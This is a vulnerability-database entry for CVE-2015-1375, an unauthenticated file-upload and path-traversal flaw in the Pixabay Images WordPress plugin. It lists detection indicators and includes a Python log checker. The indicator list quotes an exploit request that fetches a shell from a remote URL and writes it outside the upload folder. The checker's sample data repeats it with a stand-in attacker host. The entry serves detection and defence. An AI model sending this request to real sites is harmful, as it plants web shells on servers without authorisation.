cbcvebase.
CVE-2015-1375
published 2015-01-28

Priority: P2, 64, high
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
EXPLOIT
EPSS: 12.25% (95.7th percentile)
pixabay-images.php in the Pixabay Images plugin before 2.4 for WordPress does not properly restrict access to the upload functionality, which allows remote attackers to write to arbitrary files.

Affected

1 range
Vendor                  Product         Version range  Fixed in
pixabay_images_project  pixabay_images  <= 2.3         2.4

Detection & IOCs (extracted from sources)

path: /wp-admin/
path: pixabay-images.php
command: pixabay_upload=1&image_url=<shellcode_url>&image_user=none&q=xxx/../../../../../../mogwai
  • Look for unauthenticated POST requests to /wp-admin/ containing the parameter 'pixabay_upload=1', which indicates exploitation of the authentication bypass combined with arbitrary file upload.
  • Detect path traversal attempts via the 'q' POST parameter containing sequences such as '../../' targeting the Pixabay Images plugin upload functionality.
  • Monitor for POST requests with Content-Type 'application/x-www-form-urlencoded' to /wp-admin/ containing both 'pixabay_upload' and 'image_url' parameters, especially where image_url points to an external or attacker-controlled host serving PHP files.
  • The plugin does not validate the host in the provided download URL; alert on 'image_url' values referencing non-Pixabay domains, particularly those ending in .php.
  • The authentication bypass means exploitation requires NO valid WordPress credentials; any unauthenticated remote attacker can trigger the upload endpoint.
  • Path traversal via the 'q' parameter allows files to be written outside the intended 'download' folder, meaning uploaded shells may land anywhere on the filesystem accessible to the web server.
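As an added example (not code from cbcvebase or the Pixabay Images plugin), the checker below applies the detection heuristics listed above to request records that capture POST bodies, such as a WAF or reverse-proxy log. The record fields (method, path, content_type, body), the sample records and the hostnames in them are constructed assumptions.

```python
# Added example: flag requests matching the CVE-2015-1375 detection heuristics.
# Record layout and sample data are constructed; adapt the field names to your log.
from urllib.parse import parse_qs, urlparse

# Constructed sample records (hostnames are placeholders, not real indicators).
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/wp-admin/",
     "content_type": "application/x-www-form-urlencoded",
     "body": "pixabay_upload=1&image_url=http://attacker.example/payload.php"
             "&image_user=none&q=xxx/../../../../../../mogwai"},
    {"method": "POST", "path": "/wp-admin/",
     "content_type": "application/x-www-form-urlencoded",
     "body": "pixabay_upload=1&image_url=https://pixabay.com/static/uploads/photo/abc.jpg"
             "&image_user=none&q=flower"},
    {"method": "GET", "path": "/wp-admin/", "content_type": "", "body": ""},
]

def analyse_request(req):
    """Return the list of detection reasons for one request (empty if nothing matched)."""
    reasons = []
    if req.get("method") != "POST" or not req.get("path", "").startswith("/wp-admin/"):
        return reasons
    params = parse_qs(req.get("body", ""), keep_blank_values=True)
    if params.get("pixabay_upload", [""])[0] != "1":
        return reasons
    # The upload trigger on /wp-admin/ is itself the primary indicator.
    reasons.append("pixabay_upload=1 POST to /wp-admin/")
    image_url = params.get("image_url", [""])[0]
    if image_url:
        parsed = urlparse(image_url)
        host = (parsed.hostname or "").lower()
        # The plugin never validated the download host; anything not pixabay is suspect.
        if not (host == "pixabay.com" or host.endswith(".pixabay.com")):
            reasons.append(f"image_url host is not pixabay: {host or '<none>'}")
        if parsed.path.lower().endswith(".php"):
            reasons.append("image_url points to a .php file")
    q = params.get("q", [""])[0]
    if "../" in q or "..\\" in q:
        reasons.append("path traversal sequence in q")
    return reasons

def find_suspicious(requests):
    """Return (index, reasons) for every request that produced at least one reason."""
    hits = []
    for i, req in enumerate(requests):
        reasons = analyse_request(req)
        if reasons:
            hits.append((i, reasons))
    return hits

if __name__ == "__main__":
    for idx, why in find_suspicious(SAMPLE_REQUESTS):
        print(idx, why)
```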